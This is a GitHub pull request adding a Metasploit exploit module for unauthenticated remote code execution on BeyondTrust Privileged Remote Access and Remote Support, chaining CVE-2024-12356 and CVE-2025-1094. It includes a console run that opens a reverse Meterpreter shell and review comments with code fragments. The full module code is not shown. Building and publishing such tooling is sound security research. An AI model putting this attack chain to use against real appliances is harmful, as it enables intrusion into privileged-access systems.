Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Exploit module for BeyondTrust Privileged Remote Access & Remote Support (CVE-2024-12356, CVE-2025-1094) #19877

Open
wants to merge 10 commits into
base: master
Choose a base branch
from
Open

Exploit module for BeyondTrust Privileged Remote Access & Remote Support (CVE-2024-12356, CVE-2025-1094) #19877

wants to merge 10 commits into from
+423 −0

Conversation

sfewer-r7
Copy link
Contributor

@sfewer-r7 sfewer-r7 commented Feb 13, 2025
edited
Loading

Overview

This pull request adds an unauthenticated RCE exploit module targeting BeyondTrust Privileged Remote Access & Remote Support, leveraging CVE-2024-12356 + CVE-2025-1094.

CVE-2024-12356 is an argument injection issue in the BeyondTrust code base, and CVE-2025-1094 is a SQL injection issue in the PostgreSQL code base (shipped as a component in the BeyondTrust appliance).

The exploit can either leverage CVE-2024-12356 and CVE-2025-1094 together, or solely leverage CVE-2025-1094 (this is the default) for RCE. Arbitrary code execution is achieved with the privileges of the current site user (i.e. not root).

For a full technical analysis of the vulnerabilities, please read our AttackerKB Rapid7 Analysis.

Example

msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > check
[*] 192.168.86.105:443 - The target appears to be vulnerable. Detected version 24.1.2
msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected version 24.1.2
[*] Using company name: mytestcompany
[*] Sending stage (3045380 bytes) to 192.168.86.105
[*] Meterpreter session 1 opened (192.168.86.122:4444 -> 192.168.86.105:10104) at 2025-01-31 10:51:38 +0000

meterpreter > getuid
Server username: mytestcompany
meterpreter > sysinfo
Computer     : 192.168.86.105
OS           : Gentoo 2.14 (Linux 6.1.76-bt)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@smcintyre-r7 smcintyre-r7 added module rn-modules release notes for new or majorly enhanced modules hotness Something we're really excited about labels Feb 14, 2025
@sfewer-r7
Improve the auto discovery of the target site info. We can query an u…
2d858ac 
…ndocumented API endpoint to discover the target site company name.
@msutovsky-r7 msutovsky-r7 self-assigned this Feb 14, 2025
@sfewer-r7
Copy link
Contributor Author

Adding a comment here to mention that this module relies on #19834 - to fix an issue with WebSockets, so dropping the module into an older version of the framework wont work, you need to run MSF that has the WebSocket bug fix in it (MSF 6.4.47 and above).

jvoisin
jvoisin reviewed Feb 14, 2025
View reviewed changes
modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
'DisableNops' => true,
# Our payload is passed to the PHP function pg_escape_string. We want to avoid any single quotes
# getting escaped unexpectedly. The server may be configured to escape double quotes (not by default).
# We also want to avoid any forward slash characters if CVE-2024-12356 is being leveraged.
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
# We also want to avoid any forward slash characters if CVE-2024-12356 is being leveraged.
# We also want to avoid any backward slash characters if CVE-2024-12356 is being leveraged.

modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb

return CheckCode::Unknown('Connection failed') unless res

return CheckCode::Unknown("Unexpected response code #{res.code == 200}") unless res.code == 200
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
return CheckCode::Unknown("Unexpected response code #{res.code == 200}") unless res.code == 200
return CheckCode::Unknown("Unexpected response code #{res.code != 200}") unless res.code == 200

modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
# 00000020 44 46 80 00 0a 91 07 81 32 34 2e 31 2e 32 00 82 |DF......24.1.2..|
# 00000030 00 00 00 00 67 8e 25 28 91 06 83 65 6e 2d 75 73 |....g.%(...en-us|

# First there is a "0 Successful\nLOCALE_ID\nTIMESTAMP\n" value, we we use a regex to match this so we can ignore it.
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
# First there is a "0 Successful\nLOCALE_ID\nTIMESTAMP\n" value, we we use a regex to match this so we can ignore it.
# First there is a "0 Successful\nLOCALE_ID\nTIMESTAMP\n" value, we use a regex to match this so we can ignore it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@jvoisin jvoisin jvoisin left review comments

At least 1 approving review is required to merge this pull request.

Assignees

@msutovsky-r7 msutovsky-r7

Labels
hotness Something we're really excited about module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@sfewer-r7 @jvoisin @smcintyre-r7 @msutovsky-r7